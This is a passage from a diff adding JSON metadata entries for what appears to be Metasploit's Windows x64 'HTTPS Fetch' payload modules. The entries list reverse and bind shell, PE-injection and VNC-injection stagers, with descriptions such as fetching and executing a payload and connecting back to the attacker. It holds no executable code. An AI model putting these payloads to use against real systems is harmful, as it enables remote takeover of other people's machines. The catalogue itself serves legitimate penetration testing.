null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/peinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/https/x64/peinject/bind_ipv6_tcp_uuid": { + "name": "HTTPS Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/https/x64/peinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/peinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/https/x64/peinject/bind_named_pipe": { + "name": "HTTPS Fetch, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/https/x64/peinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/peinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/peinject/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/https/x64/peinject/bind_tcp": { + "name": "HTTPS Fetch, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/https/x64/peinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/peinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/peinject/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/https/x64/peinject/bind_tcp_rc4": { + "name": "HTTPS Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/https/x64/peinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/peinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/peinject/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/https/x64/peinject/bind_tcp_uuid": { + "name": "HTTPS Fetch, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/https/x64/peinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/peinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/peinject/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/https/x64/peinject/reverse_named_pipe": { + "name": "HTTPS Fetch, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/https/x64/peinject/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker via a named pipe pivot", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/peinject/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/peinject/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_cmd/windows/https/x64/peinject/reverse_tcp": { + "name": "HTTPS Fetch, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/https/x64/peinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/peinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/peinject/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/https/x64/peinject/reverse_tcp_rc4": { + "name": "HTTPS Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/https/x64/peinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/peinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/peinject/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/https/x64/peinject/reverse_tcp_uuid": { + "name": "HTTPS Fetch, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/https/x64/peinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/peinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/peinject/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/https/x64/pingback_reverse_tcp": { + "name": "HTTPS Fetch, Windows x64 Pingback, Reverse TCP Inline", + "fullname": "payload/cmd/windows/https/x64/pingback_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and report UUID (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/pingback_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/pingback_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/https/x64/powershell_bind_tcp": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/windows/https/x64/powershell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/powershell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/powershell_bind_tcp", + "staged": false + }, + "payload_cmd/windows/https/x64/powershell_reverse_tcp": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/windows/https/x64/powershell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/powershell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/powershell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/https/x64/powershell_reverse_tcp_ssl": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/windows/https/x64/powershell_reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/powershell_reverse_tcp_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/powershell_reverse_tcp_ssl", + "staged": false + }, + "payload_cmd/windows/https/x64/shell/bind_ipv6_tcp": { + "name": "HTTPS Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/https/x64/shell/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/shell/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/shell/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/https/x64/shell/bind_ipv6_tcp_uuid": { + "name": "HTTPS Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/https/x64/shell/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/shell/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/shell/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/https/x64/shell/bind_named_pipe": { + "name": "HTTPS Fetch, Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/https/x64/shell/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/shell/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/shell/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/https/x64/shell/bind_tcp": { + "name": "HTTPS Fetch, Windows x64 Command Shell, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/https/x64/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/shell/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/https/x64/shell/bind_tcp_rc4": { + "name": "HTTPS Fetch, Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/https/x64/shell/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/shell/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/shell/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/https/x64/shell/bind_tcp_uuid": { + "name": "HTTPS Fetch, Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/https/x64/shell/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/shell/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/shell/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/https/x64/shell/reverse_tcp": { + "name": "HTTPS Fetch, Windows x64 Command Shell, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/https/x64/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/shell/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/https/x64/shell/reverse_tcp_rc4": { + "name": "HTTPS Fetch, Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/https/x64/shell/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/shell/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/shell/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/https/x64/shell/reverse_tcp_uuid": { + "name": "HTTPS Fetch, Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/https/x64/shell/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/shell/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/shell/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/https/x64/shell_bind_tcp": { + "name": "HTTPS Fetch, Windows x64 Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/windows/https/x64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection and spawn a command shell (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/shell_bind_tcp", + "staged": false + }, + "payload_cmd/windows/https/x64/shell_reverse_tcp": { + "name": "HTTPS Fetch, Windows x64 Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/windows/https/x64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a command shell (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/https/x64/vncinject/bind_ipv6_tcp": { + "name": "HTTPS Fetch, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/https/x64/vncinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/vncinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/https/x64/vncinject/bind_ipv6_tcp_uuid": { + "name": "HTTPS Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/https/x64/vncinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, 